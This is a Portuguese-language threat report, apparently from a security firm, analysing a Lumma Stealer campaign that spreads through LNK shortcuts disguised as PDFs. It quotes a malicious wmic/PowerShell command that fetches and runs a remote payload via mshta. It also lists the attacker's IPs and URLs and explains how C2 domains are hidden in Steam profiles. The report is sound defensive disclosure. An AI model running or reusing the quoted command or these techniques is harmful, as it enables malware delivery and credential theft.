🚀 A CloudSEK se torna a primeira empresa de segurança cibernética de origem indiana a receber investimentos da Estado dos EUA fundo
Leia mais

O Lumma Stealer é um malware que rouba informações oferecido por meio de uma plataforma de malware como serviço (MaaS). Ele foi projetado para roubar dados confidenciais, incluindo senhas, informações do navegador e detalhes da carteira de criptomoedas.
Este relatório detalha uma campanha de malware em andamento distribuindo o ladrão de informações Lumma Stealer. O principal vetor de infecção da campanha envolve o uso de arquivos LNK (atalho) maliciosos criados para aparecerem como documentos PDF legítimos. Esses arquivos LNK, quando executados, iniciam um processo de infecção em vários estágios, levando à implantação do Lumma Stealer na máquina da vítima. A campanha se concentra em induzir os usuários a executar arquivos maliciosos, destacando a importância da conscientização do usuário e de medidas de segurança robustas. A campanha de malware tem como alvo vários setores, incluindo Educação e Academia, Corporativo e Empresarial, Governamental e Jurídico, Saúde e Farmacêutica, Financeiro e Bancário, Engenharia e Fabricação, Tecnologia e Blockchain e Mídia e Jornalismo.
Anteriormente, publicamos dois relatórios de pesquisa aprofundados analisando a campanha Lumma Stealer, detalhando suas táticas, técnicas e procedimentos (TTPs) usados pelos agentes de ameaças para distribuir e implantar o malware.

Durante um compromisso direto, o usuário é inicialmente redirecionado para um Servidor WebDAV ao visitar determinados sites, estabelecendo uma conexão sem saber. Esse redirecionamento pode desencadear um pré-visualização da janela explorer.exe, exibindo o conteúdo do servidor WebDAV, que hospeda arquivos maliciosos projetado para explorar vulnerabilidades do sistema ou entregar malware.
Na infraestrutura analisada, arquivos maliciosos foram hospedados em um Servidor WebDAV dentro do diretório aberto “http://87[.]120[.]115[.]240/Downloads/254-zebar-school-for-children-thaltej-pro-order-abad-rural.pdf.lnk”, Quando um usuário clica para baixar o estrutura de taxas escolares, eles, sem saber, baixam um arquivo "pdf.lnk" malicioso, que aparece como um PDF devido ao seu ícone.

O diretório continha principalmente arquivo “.lnk”, que foram transformados em armas para baixar cargas maliciosas adicionais usando “mshta.exe”, um executável legítimo da Microsoft projetado para ser executado Arquivos de aplicativos HTML da Microsoft (HTA).
Os arquivos LNK (atalho) geralmente são usados como ponto de entrada em campanhas de phishing. Ao explorar seus recursos exclusivos, os agentes de ameaças podem enganar os usuários e contornar as medidas de segurança, tornando-os ferramentas eficazes para se infiltrar em sistemas e redes.

O arquivo LNK executa um PowerShell comando que se conecta a um remoto servidor, acionando o próximo estágio do ataque. “C:\Windows\System32\Wbem\wmic.exe process call create “powershell iex '\ *i*\ S*3*\ m*ta.e* https://80.76.51.231/Samarik' | powershell -”


Esses atalhos enganosos, geralmente camuflados como executáveis legítimos ou arquivos PDF, atraem usuários desavisados a clicarem, comprometendo seus sistemas ou redes.
Extraímos o script descartando a seção de sobreposição, revelando uma imagem ofuscada JavaScript código.

Ofuscado JavaScript código na seção de sobreposição de Samarik

Essa função avalia o código JavaScript armazenado na variável AeQ. O uso de eval é uma técnica comum em scripts ofuscados ou maliciosos.

Um script do PowerShell pode ser visto por meio do script JS ofuscado. Uma carga criptografada em AES e um procedimento para descriptografá-la no modo CBC usando uma chave de decodificação codificada estão incluídos nesse script do PowerShell. Técnicas simples de ofuscação matemática também são usadas no script.

As variáveis e funções normalizadas do script PowerShell mostram como a carga é baixada e executada.

Os downloads finais do script PowerShell, extraem o conteúdo e executam”Kompass-4.1.2.exe” (Lumma Stealer) de https [:] //80.76.51 [.] 231/kompass-4.1.2.exe
O Lumma Stealer tenta se conectar com servidores de comando e controle (C2) para exfiltrar dados roubados após infectar um sistema. Ele tenta alcançar vários domínios de servidor C2; no entanto, esses servidores estão atualmente inacessíveis.

A amostra usa a conexão Steam se não conseguir acessar todos os domínios C2 que possui. Os URLs do Steam diferem dos domínios C2 porque têm técnicas de decodificação distintas e são armazenados como códigos de execução.
hxxps: //steamcommunity.com/profiles/76561199724331900
O número 76561199724331900 segue o formato de um ID Steam64, sugerindo que um cliente ou jogo Steam pode estar tentando resolver um serviço de rede. Isso indica que um dispositivo na rede está tentando resolver um nome (provavelmente relacionado a uma sessão do Steam ou servidor de jogo). O perfil foi criado em 28 de junho de 2024.

A camuflagem de C2 por meio de perfis do Steam é uma técnica sofisticada de evasão que abusa de uma plataforma confiável para comunicação furtiva de comando e controle.

O agente da ameaça provavelmente construiu esse URL do Steam, que é uma página de perfil para uma conta do Steam. A amostra primeiro se conecta ao site, analisa a tag “actual_persona_name” para extrair cadeias de caracteres e, em seguida, usa o método de cifra Caesar para descriptografar as sequências e extrair domínios C2.

Com base na análise de nomes diferentes que imitam documentos PDF legítimos (por exemplo, contratos, relatórios financeiros, materiais acadêmicos e folhetos técnicos), o malware Lumma Stealer tem como alvo setores, incluindo, mas não se limitando a, Educação e Academia, Corporativo e Empresarial, Governamental e Jurídico, Saúde e Farmacêutica, Financeiro e Bancário, Engenharia e Fabricação, Tecnologia e Blockchain e Mídia e Jornalismo.
